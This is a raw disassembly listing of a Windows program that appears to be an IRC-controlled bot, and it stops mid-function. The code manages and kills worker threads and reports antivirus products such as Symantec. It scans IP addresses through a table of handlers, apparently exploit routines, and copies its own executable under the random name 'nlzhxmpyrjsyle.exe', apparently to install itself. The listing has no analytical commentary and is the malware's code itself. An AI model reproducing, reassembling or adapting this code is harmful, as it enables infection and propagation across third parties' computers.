; int __cdecl sub_40B756(char *Source,int,int)
sub_40B756 proc near ; CODE XREF: WinMain(x,x,x,x)+378�p
; WinMain(x,x,x,x)+3B7�p ...
Source = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
xor edi, edi
mov eax, offset dword_455E18
loc_40B75E: ; CODE XREF: sub_40B756+18�j
cmp byte ptr [eax], 0
jz short loc_40B772
add eax, 234h
inc edi
cmp eax, offset dword_4E2E18
jl short loc_40B75E
jmp short loc_40B7BD
; ---------------------------------------------------------------------------
loc_40B772: ; CODE XREF: sub_40B756+B�j
push esi
mov esi, edi
imul esi, 234h
push 1FFh ; Count
push [esp+0Ch+Source] ; Source
lea eax, dword_455E18[esi]
push eax ; Dest
call _strncpy
mov eax, [esp+14h+arg_4]
add esp, 0Ch
mov dword_456018[esi], eax
and dword_45601C[esi], 0
mov eax, [esp+8+arg_8]
and dword_456020[esi], 0
mov dword_456024[esi], eax
and byte_456030[esi], 0
pop esi
loc_40B7BD: ; CODE XREF: sub_40B756+1A�j
mov eax, edi
pop edi
retn
sub_40B756 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B7C1 proc near ; DATA XREF: sub_401CC7+297A�o
var_98 = dword ptr -98h
Str = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 98h
mov eax, [ebp+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+var_98]
rep movsd
push [ebp+var_10] ; int
mov dword ptr [eax+94h], 1
lea eax, [ebp+Str]
push [ebp+var_C] ; int
push eax ; Str
push [ebp+var_98] ; int
call sub_40B813
push [ebp+var_14]
call sub_40BA72
add esp, 14h
push 0
call ds:dword_4F53A0 ; ExitThread
pop edi
pop esi
sub_40B7C1 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40B813(int,char *Str,int,int)
sub_40B813 proc near ; CODE XREF: sub_40B7C1+38�p
Dest = byte ptr -200h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push esi
push edi
push 0 ; int
push [ebp+arg_8] ; int
push offset dword_44819C ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D34
add esp, 14h
xor edi, edi
mov esi, offset dword_455E18
loc_40B83D: ; CODE XREF: sub_40B813+78�j
cmp byte ptr [esi], 0
jz short loc_40B87E
cmp [ebp+arg_C], 0
jnz short loc_40B851
cmp dword ptr [esi+204h], 0
jnz short loc_40B87E
loc_40B851: ; CODE XREF: sub_40B813+33�j
push esi
push edi
lea eax, [ebp+Dest]
push offset aD_S_0 ; "%d. %s"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D34
add esp, 24h
loc_40B87E: ; CODE XREF: sub_40B813+2D�j
; sub_40B813+3C�j
add esi, 234h
inc edi
cmp esi, offset dword_4E2E18
jl short loc_40B83D
pop edi
pop esi
leave
retn
sub_40B813 endp
; =============== S U B R O U T I N E =======================================
sub_40B891 proc near ; CODE XREF: sub_401CC7+7C6C�p
; sub_40B91F+12�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
xor ebx, ebx
xor ebp, ebp
cmp esi, ebx
jle short loc_40B919
cmp esi, 400h
jge short loc_40B919
imul esi, 234h
push edi
push ebx
push dword_45602C[esi]
lea edi, dword_45602C[esi]
call ds:dword_4F5380 ; TerminateThread
cmp [edi], ebx
jz short loc_40B8C9
push 1
pop ebp
loc_40B8C9: ; CODE XREF: sub_40B891+33�j
mov [edi], ebx
lea edi, dword_456020[esi]
mov dword_456018[esi], ebx
mov dword_45601C[esi], ebx
mov eax, [edi]
cmp eax, ebx
jbe short loc_40B8EA
push eax
call sub_41A8AA
pop ecx
loc_40B8EA: ; CODE XREF: sub_40B891+50�j
mov [edi], ebx
lea edi, dword_456024[esi]
mov byte ptr dword_455E18[esi], bl
mov byte_456030[esi], bl
push dword ptr [edi]
call dword_4E3190 ; closesocket
lea esi, dword_456028[esi]
mov [edi], ebx
push dword ptr [esi]
call dword_4E3190 ; closesocket
mov [esi], ebx
pop edi
loc_40B919: ; CODE XREF: sub_40B891+D�j
; sub_40B891+15�j
mov eax, ebp
pop esi
pop ebp
pop ebx
retn
sub_40B891 endp
; =============== S U B R O U T I N E =======================================
sub_40B91F proc near ; CODE XREF: sub_401317+18�p
; WinMain(x,x,x,x):loc_4019D3�p ...
push ebx
push esi
push edi
xor ebx, ebx
xor edi, edi
mov esi, offset dword_455E18
loc_40B92B: ; CODE XREF: sub_40B91F+2A�j
cmp byte ptr [esi], 0
jz short loc_40B93C
push edi
call sub_40B891
test eax, eax
pop ecx
jz short loc_40B93C
inc ebx
loc_40B93C: ; CODE XREF: sub_40B91F+F�j
; sub_40B91F+1A�j
add esi, 234h
inc edi
cmp esi, offset dword_4E2E18
jl short loc_40B92B
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_40B91F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B951 proc near ; CODE XREF: sub_401CC7+4188�p
; sub_401CC7+42DA�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
xor ebx, ebx
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], ebx
mov esi, offset dword_45601C
loc_40B965: ; CODE XREF: sub_40B951+43�j
mov eax, [esi-4]
cmp eax, [ebp+arg_0]
jnz short loc_40B987
test edi, edi
jle short loc_40B979
cmp [esi], edi
jz short loc_40B979
cmp ebx, edi
jnz short loc_40B987
loc_40B979: ; CODE XREF: sub_40B951+1E�j
; sub_40B951+22�j
push ebx
call sub_40B891
test eax, eax
pop ecx
jz short loc_40B987
inc [ebp+var_4]
loc_40B987: ; CODE XREF: sub_40B951+1A�j
; sub_40B951+26�j ...
add esi, 234h
inc ebx
cmp esi, offset dword_4E301C
jl short loc_40B965
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_40B951 endp
; =============== S U B R O U T I N E =======================================
sub_40B99E proc near ; CODE XREF: WinMain(x,x,x,x)+40F�p
; sub_401CC7+962�p ...
arg_0 = dword ptr 4
xor eax, eax
mov ecx, offset dword_456018
loc_40B9A5: ; CODE XREF: sub_40B99E+1C�j
mov edx, [ecx]
cmp edx, [esp+arg_0]
jnz short loc_40B9AE
inc eax
loc_40B9AE: ; CODE XREF: sub_40B99E+D�j
add ecx, 234h
cmp ecx, offset dword_4E3018
jl short loc_40B9A5
retn
sub_40B99E endp
; =============== S U B R O U T I N E =======================================
sub_40B9BD proc near ; CODE XREF: sub_401CC7+2424�p
arg_0 = dword ptr 4
xor eax, eax
push esi
xor edx, edx
mov ecx, offset dword_456018
loc_40B9C7: ; CODE XREF: sub_40B9BD+1F�j
mov esi, [ecx]
cmp esi, [esp+4+arg_0]
jz short loc_40B9E0
add ecx, 234h
inc edx
cmp ecx, offset dword_4E3018
jl short loc_40B9C7
pop esi
retn
; ---------------------------------------------------------------------------
loc_40B9E0: ; CODE XREF: sub_40B9BD+10�j
mov eax, edx
pop esi
retn
sub_40B9BD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40B9E4(int,int,int,int,int,int,int,char *Str)
sub_40B9E4 proc near ; CODE XREF: sub_401CC7+1057�p
; sub_401CC7+125D�p ...
Dest = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
Str = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 200h
xor eax, eax
cmp [ebp+Str], eax
jz short loc_40B9FD
push [ebp+Str] ; Str
call _atoi
pop ecx
loc_40B9FD: ; CODE XREF: sub_40B9E4+E�j
push eax
push [ebp+arg_18]
call sub_40B951
pop ecx
test eax, eax
pop ecx
jle short loc_40BA29
push eax
lea eax, [ebp+Dest]
push [ebp+arg_14]
push [ebp+arg_10]
push offset aSSStopped_DThr ; "%s %s stopped. (%d thread(s) stopped.)"
push eax ; Dest
call _sprintf
add esp, 14h
jmp short loc_40BA43
; ---------------------------------------------------------------------------
loc_40BA29: ; CODE XREF: sub_40B9E4+26�j
push [ebp+arg_14]
lea eax, [ebp+Dest]
push [ebp+arg_10]
push offset aSNoSThreadFoun ; "%s No %s thread found."
push eax ; Dest
call _sprintf
add esp, 10h
loc_40BA43: ; CODE XREF: sub_40B9E4+43�j
cmp [ebp+arg_C], 0
jnz short loc_40BA63
push 0 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_409D34
add esp, 14h
loc_40BA63: ; CODE XREF: sub_40B9E4+63�j
lea eax, [ebp+Dest]
push eax
call sub_415C3F
pop ecx
leave
retn
sub_40B9E4 endp
; =============== S U B R O U T I N E =======================================
sub_40BA72 proc near ; CODE XREF: sub_4019E7+159�p
; sub_40B7C1+40�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
xor ecx, ecx
imul eax, 234h
mov dword_45602C[eax], ecx
mov dword_456018[eax], ecx
mov dword_45601C[eax], ecx
mov dword_456020[eax], ecx
mov dword_456024[eax], ecx
mov dword_456028[eax], ecx
mov byte ptr dword_455E18[eax], cl
mov byte_456030[eax], cl
retn
sub_40BA72 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BAAF proc near ; CODE XREF: sub_401CC7+7F03�p
; sub_40BBDD+6B�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push 1
pop eax
loc_40BAB9: ; CODE XREF: sub_40BAAF+68�j
mov cl, [esi]
test cl, cl
jz short loc_40BB19
cmp eax, 1
jnz short loc_40BB19
mov edx, [ebp+arg_4]
mov dl, [edx]
test dl, dl
jz short loc_40BB19
cmp cl, 2Ah
jz short loc_40BB00
cmp cl, 3Fh
jz short loc_40BAE3
cmp cl, 5Bh
jz short loc_40BAE8
xor eax, eax
cmp cl, dl
setz al
loc_40BAE3: ; CODE XREF: sub_40BAAF+26�j
inc [ebp+arg_4]
jmp short loc_40BB13
; ---------------------------------------------------------------------------
loc_40BAE8: ; CODE XREF: sub_40BAAF+2B�j
lea eax, [ebp+arg_4]
inc esi
push eax
lea eax, [ebp+arg_0]
push eax
mov [ebp+arg_0], esi
call sub_40BB45
mov esi, [ebp+arg_0]
pop ecx
pop ecx
jmp short loc_40BB13
; ---------------------------------------------------------------------------
loc_40BB00: ; CODE XREF: sub_40BAAF+21�j
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+arg_0]
push eax
call sub_40BBDD
mov esi, [ebp+arg_0]
pop ecx
pop ecx
dec esi
loc_40BB13: ; CODE XREF: sub_40BAAF+37�j
; sub_40BAAF+4F�j
inc esi
mov [ebp+arg_0], esi
jmp short loc_40BAB9
; ---------------------------------------------------------------------------
loc_40BB19: ; CODE XREF: sub_40BAAF+E�j
; sub_40BAAF+13�j ...
cmp byte ptr [esi], 2Ah
jnz short loc_40BB29
cmp eax, 1
jnz short loc_40BB40
inc esi
mov [ebp+arg_0], esi
jmp short loc_40BB19
; ---------------------------------------------------------------------------
loc_40BB29: ; CODE XREF: sub_40BAAF+6D�j
cmp eax, 1
jnz short loc_40BB40
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 0
jnz short loc_40BB40
cmp byte ptr [esi], 0
jnz short loc_40BB40
push 1
pop eax
jmp short loc_40BB42
; ---------------------------------------------------------------------------
loc_40BB40: ; CODE XREF: sub_40BAAF+72�j
; sub_40BAAF+7D�j ...
xor eax, eax
loc_40BB42: ; CODE XREF: sub_40BAAF+8F�j
pop esi
pop ebp
retn
sub_40BAAF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BB45 proc near ; CODE XREF: sub_40BAAF+45�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov edx, [ebp+arg_0]
push edi
xor edi, edi
push 1
mov ecx, [edx]
and [ebp+var_8], edi
pop eax
cmp byte ptr [ecx], 21h
mov [ebp+var_4], eax
jnz short loc_40BB66
inc ecx
mov [ebp+var_8], eax
mov [edx], ecx
loc_40BB66: ; CODE XREF: sub_40BB45+19�j
push ebx
push esi
loc_40BB68: ; CODE XREF: sub_40BB45+7B�j
mov ecx, [edx]
mov bl, [ecx]
cmp bl, 5Dh
jnz short loc_40BB76
cmp [ebp+var_4], eax
jnz short loc_40BBC2
loc_40BB76: ; CODE XREF: sub_40BB45+2A�j
test edi, edi
jnz short loc_40BBB7
cmp bl, 2Dh
jnz short loc_40BBAB
mov al, [ecx+1]
lea esi, [ecx+1]
mov cl, [ecx-1]
cmp cl, al
jge short loc_40BBAB
cmp al, 5Dh
jz short loc_40BBAB
cmp [ebp+var_4], edi
jnz short loc_40BBAB
mov ebx, [ebp+arg_4]
mov ebx, [ebx]
mov bl, [ebx]
cmp bl, cl
jl short loc_40BBB7
cmp bl, al
jg short loc_40BBB7
push 1
mov [edx], esi
pop edi
jmp short loc_40BBB7
; ---------------------------------------------------------------------------
loc_40BBAB: ; CODE XREF: sub_40BB45+38�j
; sub_40BB45+45�j ...
mov eax, [ebp+arg_4]
mov eax, [eax]
cmp bl, [eax]
jnz short loc_40BBB7
push 1
pop edi
loc_40BBB7: ; CODE XREF: sub_40BB45+33�j
; sub_40BB45+59�j ...
inc dword ptr [edx]
and [ebp+var_4], 0
push 1
pop eax
jmp short loc_40BB68
; ---------------------------------------------------------------------------
loc_40BBC2: ; CODE XREF: sub_40BB45+2F�j
cmp [ebp+var_8], eax
pop esi
pop ebx
jnz short loc_40BBCF
mov ecx, eax
sub ecx, edi
mov edi, ecx
loc_40BBCF: ; CODE XREF: sub_40BB45+82�j
cmp edi, eax
jnz short loc_40BBD8
mov eax, [ebp+arg_4]
inc dword ptr [eax]
loc_40BBD8: ; CODE XREF: sub_40BB45+8C�j
mov eax, edi
pop edi
leave
retn
sub_40BB45 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BBDD proc near ; CODE XREF: sub_40BAAF+59�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], 1
inc dword ptr [esi]
mov ecx, [esi]
mov eax, [edi]
xor ebx, ebx
loc_40BBF9: ; CODE XREF: sub_40BBDD+3A�j
cmp [eax], bl
jz short loc_40BC19
mov cl, [ecx]
cmp cl, 3Fh
jz short loc_40BC0E
cmp cl, 2Ah
jnz short loc_40BC19
cmp cl, 3Fh
jnz short loc_40BC11
loc_40BC0E: ; CODE XREF: sub_40BBDD+25�j
inc eax
mov [edi], eax
loc_40BC11: ; CODE XREF: sub_40BBDD+2F�j
inc dword ptr [esi]
mov ecx, [esi]
mov eax, [edi]
jmp short loc_40BBF9
; ---------------------------------------------------------------------------
loc_40BC19: ; CODE XREF: sub_40BBDD+1E�j
; sub_40BBDD+2A�j ...
mov eax, [esi]
cmp byte ptr [eax], 2Ah
jnz short loc_40BC24
inc dword ptr [esi]
jmp short loc_40BC19
; ---------------------------------------------------------------------------
loc_40BC24: ; CODE XREF: sub_40BBDD+41�j
mov eax, [edi]
mov cl, [eax]
cmp cl, bl
jnz short loc_40BC45
mov edx, [esi]
cmp [edx], bl
jz short loc_40BC36
xor eax, eax
jmp short loc_40BCA5
; ---------------------------------------------------------------------------
loc_40BC36: ; CODE XREF: sub_40BBDD+53�j
cmp cl, bl
jnz short loc_40BC45
mov ecx, [esi]
cmp [ecx], bl
jnz short loc_40BC45
push 1
pop eax
jmp short loc_40BCA5
; ---------------------------------------------------------------------------
loc_40BC45: ; CODE XREF: sub_40BBDD+4D�j
; sub_40BBDD+5B�j ...
push eax
push dword ptr [esi]
call sub_40BAAF
pop ecx
test eax, eax
pop ecx
jnz short loc_40BC8F
loc_40BC53: ; CODE XREF: sub_40BBDD+B0�j
inc dword ptr [edi]
mov eax, [edi]
loc_40BC57: ; CODE XREF: sub_40BBDD+90�j
mov ecx, [esi]
mov dl, [eax]
mov cl, [ecx]
cmp cl, dl
jz short loc_40BC6F
cmp cl, 5Bh
jz short loc_40BC6F
cmp dl, bl
jz short loc_40BC6F
inc eax
mov [edi], eax
jmp short loc_40BC57
; ---------------------------------------------------------------------------
loc_40BC6F: ; CODE XREF: sub_40BBDD+82�j
; sub_40BBDD+87�j ...
mov eax, [edi]
cmp [eax], bl
jz short loc_40BC86
push eax
push dword ptr [esi]
call sub_40BAAF
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_40BC8B
; ---------------------------------------------------------------------------
loc_40BC86: ; CODE XREF: sub_40BBDD+96�j
mov [ebp+var_4], ebx
xor eax, eax
loc_40BC8B: ; CODE XREF: sub_40BBDD+A7�j
cmp eax, ebx
jnz short loc_40BC53
loc_40BC8F: ; CODE XREF: sub_40BBDD+74�j
mov eax, [edi]
cmp [eax], bl
jnz short loc_40BCA2
mov eax, [esi]
cmp [eax], bl
jnz short loc_40BCA2
mov [ebp+var_4], 1
loc_40BCA2: ; CODE XREF: sub_40BBDD+B6�j
; sub_40BBDD+BC�j
mov eax, [ebp+var_4]
loc_40BCA5: ; CODE XREF: sub_40BBDD+57�j
; sub_40BBDD+66�j
pop edi
pop esi
pop ebx
leave
retn
sub_40BBDD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40BCAA(int,char *Str,int)
sub_40BCAA proc near ; CODE XREF: sub_401CC7+2AE6�p
Source = byte ptr -400h
Dest = byte ptr -200h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 400h
push ebx
push edi
lea eax, [ebp+Dest]
push offset asc_4485BC ; "-"
push eax ; Dest
xor ebx, ebx
call _sprintf
cmp dword_448220, ebx
pop ecx
pop ecx
mov edi, 200h
jz short loc_40BD1C
push esi
mov esi, offset dword_448228
loc_40BCDD: ; CODE XREF: sub_40BCAA+6F�j
mov eax, [esi]
test eax, eax
jbe short loc_40BD12
add ebx, eax
push eax
lea eax, [esi-26h]
push eax
lea eax, [ebp+Source]
push offset asc_4485DC ; " "
push eax ; Dest
call _sprintf
lea eax, [ebp+Source]
push edi ; Count
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _strncat
add esp, 1Ch
loc_40BD12: ; CODE XREF: sub_40BCAA+37�j
add esi, 40h
cmp dword ptr [esi-8], 0
jnz short loc_40BCDD
pop esi
loc_40BD1C: ; CODE XREF: sub_40BCAA+2B�j
push dword_4E2E1C
call sub_41B76F
pop ecx
push eax
push ebx
lea eax, [ebp+Source]
push offset aTotalDInS_ ; " Total: %d in %s."
push eax ; Dest
call _sprintf
lea eax, [ebp+Source]
push edi ; Count
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _strncat
push 0 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D34
lea eax, [ebp+Dest]
push eax
call sub_415C3F
add esp, 34h
pop edi
pop ebx
leave
retn
sub_40BCAA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40BD79(int,char *Str,int)
sub_40BD79 proc near ; CODE XREF: sub_401CC7+2AD0�p
Dest = byte ptr -200h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
mov eax, dword_4E5C18
mov ecx, dword_4E5C14
push esi
push dword_4E2E1C
lea esi, [ecx+eax]
call sub_41B76F
pop ecx
push eax
push esi
push dword_4E5C18
lea eax, [ebp+Dest]
push dword_4E5C14
push offset asc_4485FC ; "-"
push eax ; Dest
call _sprintf
push 0 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D34
lea eax, [ebp+Dest]
push eax
call sub_415C3F
add esp, 30h
pop esi
leave
retn
sub_40BD79 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40BDE5(int,char *Str,int)
sub_40BDE5 proc near ; CODE XREF: sub_401CC7+2ABA�p
Dest = byte ptr -200h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push dword_4E2E1C
call sub_41B76F
pop ecx
push eax
lea eax, [ebp+Dest]
push dword_4E5E74
push offset asc_448644 ; "-"
push eax ; Dest
call _sprintf
push 0 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D34
lea eax, [ebp+Dest]
push eax
call sub_415C3F
add esp, 28h
leave
retn
sub_40BDE5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40BE3A(int,char *Str,int)
sub_40BE3A proc near ; CODE XREF: sub_401CC7+2AA4�p
Source = byte ptr -1000h
Dest = byte ptr -800h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 1000h
call __alloca_probe
push edi
lea eax, [ebp+Dest]
push offset asc_448670 ; "-"
push eax ; Dest
call _sprintf
cmp dword_448220, 0
pop ecx
pop ecx
mov edi, 800h
jz short loc_40BEA6
push esi
mov esi, offset aSymantec ; "Symantec"
loc_40BE6F: ; CODE XREF: sub_40BE3A+69�j
lea eax, [esi-0Ah]
push eax
push esi
lea eax, [ebp+Source]
push offset asc_44868C ; " "
push eax ; Dest
call _sprintf
lea eax, [ebp+Source]
push edi ; Count
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _strncat
add esi, 40h
add esp, 1Ch
cmp dword ptr [esi+1Eh], 0
jnz short loc_40BE6F
pop esi
loc_40BEA6: ; CODE XREF: sub_40BE3A+2D�j
push dword_4E2E1C
call sub_41B76F
pop ecx
push eax
lea eax, [ebp+Source]
push offset aScanTimeS_ ; " Scan Time: %s."
push eax ; Dest
call _sprintf
lea eax, [ebp+Source]
push edi ; Count
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _strncat
push 0 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D34
lea eax, [ebp+Dest]
push eax
call sub_415C3F
add esp, 30h
pop edi
leave
retn
sub_40BE3A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BF01 proc near ; DATA XREF: sub_401CC7+30DA�o
Dest = byte ptr -3F0h
var_1F0 = dword ptr -1F0h
var_1EC = byte ptr -1ECh
var_1DC = byte ptr -1DCh
var_15C = byte ptr -15Ch
var_150 = dword ptr -150h
var_14C = dword ptr -14Ch
var_148 = dword ptr -148h
var_140 = dword ptr -140h
var_13C = dword ptr -13Ch
Format = byte ptr -134h
Str = byte ptr -124h
var_A4 = byte ptr -0A4h
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3F0h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Bh
mov esi, eax
pop ecx
lea edi, [ebp+Format]
rep movsd
mov dword ptr [eax+128h], 1
lea eax, [ebp+Format]
push eax
call dword_4E3138 ; inet_addr
xor edi, edi
mov [ebp+var_8], eax
cmp dword_448220, edi
mov [ebp+var_4], edi
mov [ebp+arg_0], edi
jz loc_40C063
mov ebx, offset dword_448220
mov eax, ebx
loc_40BF52: ; CODE XREF: sub_40BF01+15C�j
push [ebp+var_1C]
push dword ptr [eax]
push [ebp+var_8]
call sub_40C6E7
add esp, 0Ch
cmp eax, 1
jnz loc_40C053
push dword ptr [ebx]
lea esi, [ebx-28h]
lea eax, [ebp+Format]
push eax
lea eax, [esi+0Ah]
push eax
lea eax, [ebp+Dest]
push offset asc_4486AC ; "-"
push eax ; Dest
call _sprintf
push edi ; int
lea eax, [ebp+Dest]
push [ebp+var_14] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_24] ; int
call sub_409D34
lea eax, [ebp+Dest]
push eax
call sub_415C3F
add esp, 2Ch
lea eax, [ebp+Format]
push eax ; Format
lea eax, [ebp+var_1EC]
push eax ; Dest
call _sprintf
pop ecx
lea eax, [ebp+var_15C]
pop ecx
push esi ; Format
push eax ; Dest
call _sprintf
cmp [ebp+var_A4], 0
pop ecx
pop ecx
lea eax, [ebp+var_A4]
jnz short loc_40BFEE
lea eax, [ebp+Str]
loc_40BFEE: ; CODE XREF: sub_40BF01+E5�j
push eax ; Format
lea eax, [ebp+var_1DC]
push eax ; Dest
call _sprintf
mov eax, [ebp+var_24]
pop ecx
mov [ebp+var_1F0], eax
mov eax, [ebp+var_14]
mov [ebp+var_140], eax
mov eax, [ebp+var_10]
pop ecx
mov [ebp+var_13C], eax
mov eax, [ebx]
sub esp, 0BCh
mov [ebp+var_150], eax
mov eax, [ebp+var_18]
push 2Fh
mov [ebp+var_14C], eax
mov eax, [ebp+arg_0]
pop ecx
lea esi, [ebp+var_1F0]
mov edi, esp
mov [ebp+var_148], eax
rep movsd
call dword ptr [ebx+4]
add esp, 0BCh
inc [ebp+var_4]
xor edi, edi
loc_40C053: ; CODE XREF: sub_40BF01+64�j
inc [ebp+arg_0]
add ebx, 40h
mov eax, ebx
cmp [ebx], edi
jnz loc_40BF52
loc_40C063: ; CODE XREF: sub_40BF01+44�j
push [ebp+var_4]
lea eax, [ebp+Format]
push eax
lea eax, [ebp+Dest]
push offset asc_4486DC ; "-"
push eax ; Dest
call _sprintf
push edi ; int
lea eax, [ebp+Dest]
push [ebp+var_14] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_24] ; int
call sub_409D34
lea eax, [ebp+Dest]
push eax
call sub_415C3F
push [ebp+var_18]
call sub_40BA72
add esp, 2Ch
push edi
call ds:dword_4F53A0 ; ExitThread
sub_40BF01 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40C0B6(int,char *Str,int,int)
sub_40C0B6 proc near ; CODE XREF: sub_401CC7+243F�p
Dest = byte ptr -200h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push 0Bh
call sub_40B99E
test eax, eax
pop ecx
jle short loc_40C0F2
mov eax, [ebp+arg_C]
push dword_4E3258[eax*8]
call dword_4E3184 ; inet_ntoa
push eax
lea eax, [ebp+Dest]
push offset asc_448710 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp short loc_40C105
; ---------------------------------------------------------------------------
loc_40C0F2: ; CODE XREF: sub_40C0B6+13�j
lea eax, [ebp+Dest]
push offset asc_44872C ; "-"
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_40C105: ; CODE XREF: sub_40C0B6+3A�j
push 0 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D34
lea eax, [ebp+Dest]
push eax
call sub_415C3F
add esp, 18h
leave
retn
sub_40C0B6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40C12D(int,int,int,int,char Format,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,char,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int)
sub_40C12D proc near ; CODE XREF: sub_40CB69+4F�p
var_210 = dword ptr -210h
Source = byte ptr -204h
var_4 = byte ptr -4
Format = byte ptr 18h
arg_90 = byte ptr 98h
arg_110 = dword ptr 118h
arg_130 = dword ptr 138h
arg_138 = dword ptr 140h
arg_13C = dword ptr 144h
push ebp
mov ebp, esp
sub esp, 204h
mov eax, [ebp+arg_130]
push ebx
cmp eax, 0FFFFFFFFh
push esi
jz loc_40C5FF
shl eax, 6
xor ebx, ebx
cmp dword_44822C[eax], ebx
jz loc_40C5FF
push 5
call sub_40B99E
test eax, eax
pop ecx
jnz loc_40C3B4
mov eax, dword_43F078
push edi
mov esi, offset dword_4E5314
push 104h
push esi
push ebx
mov dword_4E5524, eax
mov dword_4E5520, ebx
call ds:dword_4F5344 ; GetModuleFileNameA
mov edi, offset Str ; "nlzhxmpyrjsyle.exe"
push 103h ; Count
push edi ; Source
push offset byte_4E5418 ; Dest
call _strncpy
mov eax, [ebp+arg_110]
add esp, 0Ch
cmp [ebp+arg_90], bl
mov dword_4E5310, eax
mov eax, [ebp+arg_138]
push 7Fh ; Count
mov dword_4E55A8, eax
